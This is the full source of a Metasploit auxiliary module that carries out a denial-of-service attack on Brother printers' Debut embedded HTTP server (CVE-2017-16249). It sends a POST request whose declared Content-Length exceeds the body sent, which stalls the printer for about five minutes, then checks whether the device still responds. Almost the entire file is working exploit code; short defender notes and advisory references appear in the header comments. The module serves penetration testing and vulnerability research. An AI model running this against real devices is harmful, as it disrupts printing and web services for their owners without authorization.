GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/brother_debut_dos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
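# Auxiliary DoS module for CVE-2017-16249: the Debut embedded HTTP server
# (<= 1.20) on Brother printers stalls when a POST declares a Content-Length
# larger than the body that is actually sent.
#
# Defender notes:
# - The triggering request is a POST to '/' whose declared Content-Length
#   exceeds the bytes delivered; per the module description the device then
#   stops answering HTTP and print requests for roughly 300 seconds.
# - Limiting which hosts can reach the printer's embedded web server narrows
#   who is able to trigger the condition.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  # Registers the module metadata (name, description, references, notes).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Brother Debut http Denial Of Service',
        'Description' => %q{
          The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial
          of Service (DoS) condition via a crafted HTTP request. The printer will be
          unresponsive from HTTP and printing requests for ~300 seconds. After which, the
          printer will start responding again.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'z00n <[email protected]>', # vulnerability disclosure
          'h00die' # metasploit module
        ],
        'References' => [
          [ 'CVE', '2017-16249' ],
          [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18730']
        ],
        'DisclosureDate' => '2017-11-02',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Probes the target with a plain GET / using a 10 second timeout.
  #
  # @return [Boolean] true when a response object came back; false when the
  #   response was nil or the connection failed (an error is printed for the
  #   connection-failure case)
  def is_alive?
    res = send_request_raw({ 'method' => 'GET', 'uri' => '/' }, 10)
    !res.nil?
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
    print_error("Couldn't connect to #{peer}")
    false
  end

  # Sends the POST whose Content-Length is larger than its body.
  #
  # @return [Boolean] true when send_request_cgi returned without one of the
  #   rescued connection errors, false otherwise (an error is printed)
  def dos
    # The web server is single threaded, and when the content length is longer than the data, it will continue to wait
    # for the rest of the data, which never comes, and times out after ~300 seconds.
    data = Rex::Text.rand_text_alphanumeric(40)
    send_request_cgi({
      'method' => 'POST',
      'uri' => '/',
      'data' => data, # 'asdasdasdasdasdasdasd',
      'headers' => {
        # These are kept here since they were in the original exploit, however they are not required
        # 'Host' => 'asdasdasd',
        # 'User-Agent' => 'asdasdasd',
        # 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        # 'Accept-Language' => 'en-US,en;q=0.5',
        # 'Referer' => 'asdasdasdasd',
        # 'Connection' => 'close',
        # 'Upgrade-Insecure-Requests' => 1,
        # 'Content-Type' => 'application/x-www-form-urlencoded',
        'Content-Length' => data.length + rand(10) + 10 # 42
      }
    })
    # The response itself is not a usable signal (a stalled server yields
    # none), so report only whether the request went out.
    true
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
    print_error("Couldn't connect to #{peer}")
    false
  end

  # Sends the request, then probes the target and reports the outcome.
  #
  # Stops without a verdict when the request could not be delivered, because
  # the follow-up probe cannot tell an unreachable host from a stalled one.
  def run
    started_at = Time.now
    print_status("Sending malformed POST request at #{started_at.strftime('%Y-%m-%d %H:%M:%S')}.")

    # Without this guard a host that was never reachable fails the probe
    # below as well and would be reported as a success.
    return unless dos

    # Check to see if it worked or not
    if is_alive?
      print_error("#{peer} - Server is still alive.")
    else
      print_good("#{peer} - Connection Refused: Success! Server will recover about #{(started_at + 300).strftime('%Y-%m-%d %H:%M:%S')}")
    end
  end
end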